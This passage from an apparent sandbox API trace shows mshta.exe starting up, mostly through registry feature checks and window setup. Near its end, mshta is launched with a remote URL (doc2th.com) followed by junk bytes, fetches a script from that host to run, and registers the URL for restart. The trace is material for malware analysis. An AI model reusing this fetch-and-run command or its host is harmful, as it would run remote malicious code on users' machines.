phkResult=0x40f1ac*=0x74) returned 0x0 [0026.286] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.286] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.286] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.286] RegCloseKey (hKey=0x0) returned 0x6 [0026.286] RegCloseKey (hKey=0x0) returned 0x6 [0026.286] RegCloseKey (hKey=0x74) returned 0x0 [0026.286] RegCloseKey (hKey=0x78) returned 0x0 [0026.286] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.287] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.287] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.287] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x7c) returned 0x0 [0026.287] SHRegGetValueW () returned 0x2 [0026.287] SHRegGetValueW () returned 0x2 [0026.287] RegCloseKey (hKey=0x7c) returned 0x0 [0026.287] RegCloseKey (hKey=0x0) returned 0x6 [0026.287] RegCloseKey (hKey=0x0) returned 0x6 [0026.287] RegCloseKey (hKey=0x78) returned 0x0 [0026.287] RegCloseKey (hKey=0x74) returned 0x0 [0026.287] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x74) returned 0x0 [0026.287] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.287] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.287] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.287] RegCloseKey (hKey=0x0) returned 0x6 [0026.287] RegCloseKey (hKey=0x0) returned 0x6 [0026.287] RegCloseKey (hKey=0x74) returned 0x0 [0026.288] RegCloseKey (hKey=0x78) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.288] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.288] RegCloseKey (hKey=0x0) returned 0x6 [0026.288] RegCloseKey (hKey=0x0) returned 0x6 [0026.288] RegCloseKey (hKey=0x78) returned 0x0 [0026.288] RegCloseKey (hKey=0x74) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x74) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.288] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.288] RegCloseKey (hKey=0x0) returned 0x6 [0026.288] RegCloseKey (hKey=0x0) returned 0x6 [0026.288] RegCloseKey (hKey=0x74) returned 0x0 [0026.289] RegCloseKey (hKey=0x78) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.289] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.289] RegCloseKey (hKey=0x0) returned 0x6 [0026.289] RegCloseKey (hKey=0x0) returned 0x6 [0026.289] RegCloseKey (hKey=0x78) returned 0x0 [0026.289] RegCloseKey (hKey=0x74) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x74) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.289] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.289] RegCloseKey (hKey=0x0) returned 0x6 [0026.289] RegCloseKey (hKey=0x0) returned 0x6 [0026.289] RegCloseKey (hKey=0x74) returned 0x0 [0026.290] RegCloseKey (hKey=0x78) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.290] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.290] RegCloseKey (hKey=0x0) returned 0x6 [0026.290] RegCloseKey (hKey=0x0) returned 0x6 [0026.290] RegCloseKey (hKey=0x78) returned 0x0 [0026.290] RegCloseKey (hKey=0x74) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x74) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.290] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.290] RegCloseKey (hKey=0x0) returned 0x6 [0026.290] RegCloseKey (hKey=0x0) returned 0x6 [0026.290] RegCloseKey (hKey=0x74) returned 0x0 [0026.291] RegCloseKey (hKey=0x78) returned 0x0 [0026.291] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.291] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.291] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.291] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.291] RegCloseKey (hKey=0x0) returned 0x6 [0026.291] RegCloseKey (hKey=0x0) returned 0x6 [0026.291] RegCloseKey (hKey=0x78) returned 0x0 [0026.291] RegCloseKey (hKey=0x74) returned 0x0 [0026.291] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0026.292] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.292] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x7c) returned 0x0 [0026.292] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.292] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.292] RegCloseKey (hKey=0x0) returned 0x6 [0026.292] RegCloseKey (hKey=0x0) returned 0x6 [0026.292] RegCloseKey (hKey=0x78) returned 0x0 [0026.293] RegCloseKey (hKey=0x7c) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x7c) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.293] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.293] RegCloseKey (hKey=0x0) returned 0x6 [0026.293] RegCloseKey (hKey=0x0) returned 0x6 [0026.293] RegCloseKey (hKey=0x7c) returned 0x0 [0026.293] RegCloseKey (hKey=0x78) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x7c) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.293] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.293] RegCloseKey (hKey=0x0) returned 0x6 [0026.293] RegCloseKey (hKey=0x0) returned 0x6 [0026.293] RegCloseKey (hKey=0x78) returned 0x0 [0026.293] RegCloseKey (hKey=0x7c) returned 0x0 [0026.294] GetSystemMetrics (nIndex=68) returned 4 [0026.294] GetSystemMetrics (nIndex=69) returned 4 [0026.294] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0026.294] GetSystemDefaultLCID () returned 0x409 [0026.294] GetVersionExW (in: lpVersionInformation=0x40f110*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x76fa2fe7, dwMinorVersion=0x76fa2e82, dwBuildNumber=0x6368afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x40f110*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0026.294] GetUserDefaultUILanguage () returned 0x409 [0026.294] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x40f060, cchData=16 | out: lpLCData="\x03") returned 16 [0026.295] GetKeyboardLayoutList (in: nBuff=32, lpList=0x40f090 | out: lpList=0x40f090) returned 1 [0026.295] GetSystemMetrics (nIndex=4096) returned 0 [0026.295] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b4 | out: phkResult=0x40f1b4*=0x7c) returned 0x0 [0026.295] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b8 | out: phkResult=0x40f1b8*=0x78) returned 0x0 [0026.295] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f174 | out: phkResult=0x40f174*=0x0) returned 0x2 [0026.295] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f174 | out: phkResult=0x40f174*=0x0) returned 0x2 [0026.295] RegCloseKey (hKey=0x0) returned 0x6 [0026.295] RegCloseKey (hKey=0x0) returned 0x6 [0026.295] RegCloseKey (hKey=0x7c) returned 0x0 [0026.295] RegCloseKey (hKey=0x78) returned 0x0 [0026.295] GetModuleFileNameW (in: hModule=0x63150000, lpFilename=0x40f01c, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")) returned 0x1e [0026.296] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0026.296] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0026.296] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0026.296] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0026.296] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0026.296] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc198 [0026.296] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc199 [0026.296] GetDC (hWnd=0x0) returned 0x120108b4 [0026.296] SHCreateShellPalette (hdc=0x0) returned 0x120807e9 [0026.296] GetPaletteEntries (in: hpal=0x120807e9, iStart=0x0, cEntries=0x100, pPalEntries=0x6368a494 | out: pPalEntries=0x6368a494) returned 0x100 [0026.296] SHGetInverseCMAP (in: pbMap=0x63688a7c, cbMap=0x4 | out: pbMap=0x63688a7c) returned 0x0 [0026.296] GetDeviceCaps (hdc=0x120108b4, index=38) returned 32409 [0026.296] ReleaseDC (hWnd=0x0, hDC=0x120108b4) returned 1 [0026.297] GetCurrentProcessId () returned 0xa18 [0026.297] _vsnprintf (in: _DstBuf=0x40f560, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x40f228 | out: _DstBuf="#MSHTML#PERF#00000A18") returned 21 [0026.297] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000A18") returned 0x0 [0026.297] GetVersionExW (in: lpVersionInformation=0x40f244*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x40f2b0, dwMinorVersion=0x7553090d, dwBuildNumber=0x1d9, dwPlatformId=0x40f200, szCSDVersion="⡸\x0f⒨Y줠\x10⿠Y㌟盆") | out: lpVersionInformation=0x40f244*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0026.297] GetModuleHandleW (lpModuleName="advapi32") returned 0x754d0000 [0026.297] GetProcAddress (hModule=0x754d0000, lpProcName="EventWrite") returned 0x76f7d59a [0026.297] GetProcAddress (hModule=0x754d0000, lpProcName="EventRegister") returned 0x76fb5b0c [0026.297] GetProcAddress (hModule=0x754d0000, lpProcName="EventUnregister") returned 0x76fad9dd [0026.297] EtwEventRegister () returned 0x0 [0026.298] EtwRegisterTraceGuidsW () returned 0x0 [0026.298] EtwRegisterTraceGuidsW () returned 0x0 [0026.298] EtwEventRegister () returned 0x0 [0026.301] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office15\\outllib.dll", lpdwHandle=0x40f010 | out: lpdwHandle=0x40f010) returned 0x0 [0026.301] GetModuleHandleW (lpModuleName=0x0) returned 0x2b0000 [0026.302] GetModuleFileNameW (in: hModule=0x2b0000, lpFilename=0x40f01c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0026.302] PathFindFileNameW (pszPath="C:\\Windows\\system32\\mShta.exe") returned="mShta.exe" [0026.303] GetCurrentProcessId () returned 0xa18 [0026.303] GetCurrentProcessId () returned 0xa18 [0026.305] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0x98 [0026.305] GetLastError () returned 0x0 [0026.311] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xdc [0026.311] MapViewOfFile (hFileMappingObject=0xdc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x200000 [0026.312] RegCloseKey (hKey=0x26) returned 0x0 [0026.312] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c10000 [0026.312] GetProcAddress (hModule=0x76c10000, lpProcName="RegisterApplicationRestart") returned 0x76c43665 [0026.312] lstrlenA (lpString="http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC") returned 41 [0026.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf1d26, cbMultiByte=-1, lpWideCharStr=0x550e78, cchWideChar=42 | out: lpWideCharStr="http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC") returned 42 [0026.312] RegisterApplicationRestart (pwzCommandline="http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC", dwFlags=0x0) returned 0x0 [0026.313] GetProcAddress (hModule=0x63150000, lpProcName="RunHTMLApplication") returned 0x631ae710 [0026.328] GetCommandLineW () returned="mShta http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC" [0026.373] OleInitialize (pvReserved=0x0) returned 0x0 [0026.523] IsWindow (hWnd=0x0) returned 0 [0026.523] RegisterClassW (lpWndClass=0x40f8c4) returned 0xc19a [0026.523] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x2b0000, lpParam=0x63689680) returned 0x101fc [0026.523] DefWindowProcW (hWnd=0x101fc, Msg=0x24, wParam=0x0, lParam=0x40f500) returned 0x0 [0026.523] DefWindowProcW (hWnd=0x101fc, Msg=0x81, wParam=0x0, lParam=0x40f4ac) returned 0x1 [0026.524] DefWindowProcW (hWnd=0x101fc, Msg=0x83, wParam=0x0, lParam=0x40f520) returned 0x0 [0026.526] DefWindowProcW (hWnd=0x101fc, Msg=0x1, wParam=0x0, lParam=0x40f4a4) returned 0x0 [0026.526] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x101fc, hMenu=0x0, hInstance=0x2b0000, lpParam=0x63689680) returned 0x10200 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x24, wParam=0x0, lParam=0x40f500) returned 0x0 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x81, wParam=0x0, lParam=0x40f4ac) returned 0x1 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x83, wParam=0x0, lParam=0x40f520) returned 0x0 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x1, wParam=0x0, lParam=0x40f4a4) returned 0x0 [0026.526] SetWindowLongW (hWnd=0x10200, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x7c, wParam=0xfffffff0, lParam=0x40f894) returned 0x0 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x7d, wParam=0xfffffff0, lParam=0x40f894) returned 0x0 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x104, lParam=0x22c5e0) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0026.527] SetWindowPos (hWnd=0x10200, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x46, wParam=0x0, lParam=0x40f8ac) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x83, wParam=0x1, lParam=0x40f880) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x47, wParam=0x0, lParam=0x40f8ac) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x104, lParam=0x22c5e0) returned 0x0 [0026.528] DefWindowProcW (hWnd=0x10200, Msg=0x83, wParam=0x1, lParam=0x40f4a8) returned 0x0 [0026.528] SendMessageW (hWnd=0x10200, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0026.528] DefWindowProcW (hWnd=0x10200, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0026.528] DefWindowProcW (hWnd=0x10200, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0026.545] PathRemoveArgsW (in: pszPath="http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC" | out: pszPath="http://doc2th.com/tin/foobaz.txt") [0026.545] PathRemoveBlanksW (in: pszPath="http://doc2th.com/tin/foobaz.txt" | out: pszPath="http://doc2th.com/tin/foobaz.txt") [0026.545] PathUnquoteSpacesW (in: lpsz="http://doc2th.com/tin/foobaz.txt" | out: lpsz="http://doc2th.com/tin/foobaz.txt") returned 0 [0026.546] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://doc2th.com/tin/foobaz.txt", ppmk=0x40f924*=0x0, dwFlags=0x1 | out: ppmk=0x40f924*=0xff600) returned 0x0 [0026.555] CoCreateInstance (in: rclsid=0x63289770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6330b75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x636896d4 | out: ppv=0x636896d4*=0x121030) returned 0x0 [0026.569] DllGetClassObject (in: rclsid=0x11e6fc*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7673ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40ebd4 | out: ppv=0x40ebd4*=0x63688cb0) returned 0x0 [0026.573] GetCurrentThreadId () returned 0xa1c [0026.587] RegisterClassExW (param_1=0x40ea6c) returned 0xc19b [0026.587] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc19b, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x63150000, lpParam=0x0) returned 0x10202 [0026.587] GetWindowLongW (hWnd=0x10202, nIndex=-20) returned 0 [0026.587] DefWindowProcW (hWnd=0x10202, Msg=0x81, wParam=0x0, lParam=0x40e748) returned 0x1 [0026.587] DefWindowProcW (hWnd=0x10202, Msg=0x83, wParam=0x0, lParam=0x40e770) returned 0x0 [0026.587] DefWindowProcW (hWnd=0x10202, Msg=0x1, wParam=0x0, lParam=0x40e748) returned 0x0 [0026.587] DefWindowProcW (hWnd=0x10202, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0026.587] DefWindowProcW (hWnd=0x10202, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0026.588] CreateCompatibleDC (hdc=0x0) returned 0x210107a8 [0026.588] GetDeviceCaps (hdc=0x210107a8, index=90) returned 96 [0026.588] GetDeviceCaps (hdc=0x210107a8, index=88) returned 96 